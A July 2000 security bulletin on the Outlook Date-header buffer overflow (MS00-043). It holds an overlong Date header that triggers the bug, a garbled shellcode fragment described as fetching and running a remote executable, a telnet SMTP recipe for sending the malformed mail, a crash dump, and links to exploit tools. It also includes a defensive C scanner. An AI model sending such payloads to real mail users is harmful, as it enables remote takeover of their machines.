Telecom and Logistics Associates 

TLAalert Security Service

Publication: Christian ALT

TLAnews: Security News Service

20.7.2000 Updated, original on 19.7.2000
Security: New attack method using MS Outlook
Simply by sending an e-mail, attackers can take control of a PC remotely. This vulnerability has wide implications. An old computer myth is coming true: a single e-mail could destroy a victim's computer.


Patch is now available


An old computer myth is coming true: a single e-mail could destroy a victim's computer.

People are now going to see that myth become reality.

Now, a computer vandal could conceivably take control of thousands of computers with a single mass e-mail. Intruders can get into the computer as soon as the message is downloaded by the user; there is no need to open the message to be hacked.

Security specialists around the world are describing this as one of the most serious flaws seen so far. Sample code to exploit it has been released on the Internet.

The flaw was found about a month ago by a South American security research team known as Underground Security Systems Research, or USSR Labs. After informing Microsoft, it was agreed not to publish the information until Microsoft had a chance to supply a fix. That is standard practice in the computer security business, in order to prevent possible harm to computer users.

 

This weakness was discovered at the same time by USSR Labs and Aaron Drew. The press and security specialists describe it as having very serious implications and are eagerly awaiting Microsoft's patch.

The attack relies on a buffer overflow in the message header: the Date field, and more particularly its GMT (time-zone) part, is not correctly checked. This makes it possible to append a sequence of instructions that then allows control of the system to be taken.

An example follows.


Aaron Drew posted the information yesterday on Bugtraq, a security mailing list. He and USSR Labs had informed Microsoft of the existence of this vulnerability on the same day. "This is certainly a serious one, and we will try to get the word out any way we can," said Steve Lipner, manager of the Security Response Center at Microsoft. This vulnerability can affect a user even if the user follows what would normally be safe computing practices, such as installing the Outlook Security Update and using the Security Zones feature to manage the security of his or her mail client.

Home users are at the greatest risk, Microsoft said, since they download e-mail messages directly from their ISP. To be protected, install the patch from Microsoft, which is now available.

MS00-043 Patch Available for "Malformed E-mail Header" Vulnerability

Posted on Bugtraq
A bug in a shared component of Microsoft Outlook and Outlook Express mail clients can allow a remote user to write arbitrary data to the stack. This bug has been found to exist in all versions of MS Outlook and Outlook Express on both Windows 95/98 and Windows NT 4.

The vulnerability lies in the parsing of the GMT section of the date field in the header of an email. Bounds checking on the token representing the GMT is not properly handled. This bug can be witnessed by opening an email with an exceptionally long string directly preceding the GMT specification in the Date header field such as:

Date: Fri, 13 July 2000 14:16:06
+1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

The bug lies in the shared library INETCOMM.DLL and has been successfully exploited on Windows 95, 98 and NT with both Outlook and Outlook Express.

The execution of this code is performed differently under each client. Under Outlook Express, the buffer overflow occurs as soon as the user tries to view the mail folder containing email with a malicious date header. Under Microsoft Outlook, the overflow occurs when attempting to preview, read, reply or forward any email with a malicious date header. Under MS Outlook a user may delete or save an email to disk without exploitation.

Whilst some mail transport systems seem to modify 8-bit header data or lines over 70 characters in length, preventing direct exploitation, these restrictions seem to be avoided by encoding a message with an exploit date field as a MIME attachment in Outlook's MIME attached message format. These messages also overflow the stack when read, previewed, replied to or forwarded.

Microsoft was notified of this bug on July 3.

Attached is a proof-of-point exploit that, when placed in the header field of a message or MIME attached message, will download and execute an executable from the web. (In this particular case it will launch MS Freecell)
      

 


Exploit sample as attached to the post (binary shellcode; the non-printable bytes appear here as they were rendered on the original page):
      Date: Sun, 7 May 2000 11:20:46
+10006ÝÃ^@
Ç^Ã ?<Ä-qþÿÿ<ì3É
      

 

DEMONSTRATION from USSR Labs

To test this vulnerability, telnet to an SMTP server and send the following to yourself:

HELO mail.example.com
MAIL FROM: BILLGATES@MICROSOFT.COM
RCPT TO: MY@EMAIL.COM
DATA
Date: Thu, 13 Jun 2000 12:33:16
+1111111111111111111111111111111111111111111111111111111111111
.
QUIT

(The host name after HELO and the RCPT TO address are placeholders for your own; the line containing only a dot ends the message.)

After the remote host closed the connection and sent mail to the appropriate address, upon receipt of the mail the following fault was generated by Outlook:


----------------------------------------------------------------------
OUTLOOK caused an invalid page fault in
module  at 00de:00aedc5a.
Registers:
EAX=80004005 CS=016f EIP=00aedc5a EFLGS=00010286
EBX=70bd4899 SS=0177 ESP=0241ef94 EBP=31313131
ECX=00000000 DS=0177 ESI=0241efc6 FS=2b57
EDX=81c0500c ES=0177 EDI=0241efc4 GS=0000
Bytes at CS:EIP:
Stack dump:
0241f360 0241f554 00000000 00000001 00000000 004580d0 00000054 00000054
0241efc4 0000003b 00000100 00000017 3131312b 31313131 31313131 31313131
----------------------------------------------------------------------
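The mechanism the Bugtraq post and the USSR Labs demonstration above describe, in the form of an added C example written for this page (it is not Aaron Drew's, USSR Labs' or Microsoft's code, and it does not reproduce INETCOMM.DLL): a parser that isolates the time-zone token of a Date header, the unchecked copy that lets a long token overwrite the stack (the "1111" pattern that lands in EBP in the crash dump), the bounded check that rejects such a token, and a scanner a mail gateway could run that examines every line of a message, so that a hostile Date header hidden in an attached message (the MIME evasion the post mentions) is caught as well. The 16-byte limit, the function names and the sample messages are assumptions of the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
/* Longest zone token accepted. RFC 822 zones are "+HHMM", "-HHMM" or short names
 * such as GMT, so 16 is generous; the real limit inside INETCOMM.DLL is not published. */
#define ZONE_MAX 16

/* Return the zone token of a Date header value (the whitespace-delimited token
 * after HH:MM:SS) and store its length in *len; NULL if there is none. */
const char *zone_token(const char *value, size_t *len)
{
    const char *p = strchr(value, ':');                   /* first ':' of HH:MM:SS */
    if (p == NULL) return NULL;
    while (isdigit((unsigned char)*p) || *p == ':') p++;  /* run to the end of the time */
    while (isspace((unsigned char)*p)) p++;               /* skip folding whitespace */
    if (*p == '\0') return NULL;
    const char *start = p;
    while (*p != '\0' && !isspace((unsigned char)*p)) p++;
    *len = (size_t)(p - start);
    return start;
}

/* The bug class the post describes: the zone token goes into a small fixed stack
 * buffer with no length check, so a long token overwrites the saved frame pointer
 * and return address (EBP=31313131 in the dump). Illustrative, not INETCOMM.DLL's code. */
void copy_zone_unsafe(const char *value, char out8[8])
{
    size_t len;
    const char *tok = zone_token(value, &len);
    if (tok) { memcpy(out8, tok, len); out8[len] = '\0'; }   /* len unchecked: overflow */
    else out8[0] = '\0';
}

/* Hardened check: zone present, at most ZONE_MAX bytes, and made only of letters,
 * digits, '+' and '-'. Returns 1 if acceptable, 0 otherwise. */
int date_zone_ok(const char *value)
{
    size_t len;
    const char *tok = zone_token(value, &len);
    if (tok == NULL || len > ZONE_MAX) return 0;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)tok[i]) && tok[i] != '+' && tok[i] != '-') return 0;
    return 1;
}

/* Append n bytes to a bounded buffer, truncating instead of overflowing. */
static void append(char *buf, size_t cap, size_t *used, const char *src, size_t n)
{
    if (n > cap - 1 - *used) n = cap - 1 - *used;
    memcpy(buf + *used, src, n);
    *used += n;
}

/* Count Date headers whose zone fails date_zone_ok() anywhere in a message: every
 * line is examined, not only the top header block, so a hostile Date header in an
 * attached message/rfc822 part is caught too. Folded lines are joined; no zone is bad. */
int count_bad_date_headers(const char *msg)
{
    char logical[4096];
    size_t used = 0;
    int in_date = 0, bad = 0;
    for (const char *line = msg;;) {
        const char *nl = strchr(line, '\n');
        size_t n = nl ? (size_t)(nl - line) : strlen(line);
        int cont = in_date && n > 0 && (line[0] == ' ' || line[0] == '\t');
        if (in_date && !cont) {                           /* previous Date header complete */
            logical[used] = '\0';
            bad += !date_zone_ok(logical);
            in_date = 0;
        }
        if (cont)
            append(logical, sizeof logical, &used, line, n);
        else if (n >= 5 && strncmp(line, "Date:", 5) == 0) {
            used = 0, in_date = 1;
            append(logical, sizeof logical, &used, line + 5, n - 5);
        }
        if (nl == NULL) {                                 /* input ended: check a pending one */
            logical[used] = '\0';
            return bad + (in_date && !date_zone_ok(logical));
        }
        line = nl + 1;
    }
}

/* Constructed sample messages for this example, not captured traffic. */
const char SAMPLE_BENIGN[] = "From: a@example.com\nDate: Fri, 13 Jul 2000 14:16:06 +1000\n\nbody\n";
/* Zone token of the shape shown in the post, folded onto a second line. */
const char SAMPLE_ATTACK[] = "From: a@example.com\nDate: Fri, 13 Jul 2000 14:16:06\n"
    "\t+1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n\nbody\n";
/* Clean outer header; the hostile Date header sits in an attached message. */
const char SAMPLE_NESTED[] = "Date: Thu, 13 Jun 2000 12:33:16 GMT\nContent-Type: message/rfc822\n\n"
    "Date: Thu, 13 Jun 2000 12:33:16\n +1111111111111111111111111111111111111111111111111111111111111\n\nbody\n";

int main(void)
{
    printf("benign %d, attack %d, nested %d bad Date header(s)\n", count_bad_date_headers(SAMPLE_BENIGN),
           count_bad_date_headers(SAMPLE_ATTACK), count_bad_date_headers(SAMPLE_NESTED));
    return 0;
}
```

The scanner treats a Date header with no zone token at all as bad on purpose: a mail relay that wraps the header at column 0 (as the extracted text on this page shows) strips the continuation, and a client that still parses the folded original would then see the overlong token. copy_zone_unsafe() is there only for contrast with date_zone_ok(); the demo in main() never calls it.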

      

 

 

From the USSR Labs web server you can get software to test the vulnerability, for educational purposes and at your own risk.

This code will create and send an e-mail message that, when downloaded by Outlook, will open http://www.ussrback.com

Unix/Linux Perl Version:
http://www.ussrback.com/outoutlook.pl

Windows Console Version:
http://www.ussrback.com/outoutlook.exe

Windows Console Version Source:
http://www.ussrback.com/outoutlook.zip



Copyright © Telecom and Logistics Associates Sàrl. All rights reserved.
Revised: July 20, 2000.

All information provided is of a general nature and is not intended to address the circumstances of any particular individual or entity. Although we endeavor to provide accurate and timely information, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future. No one should act upon such information without appropriate professional advice after a thorough examination of the facts of the particular situation.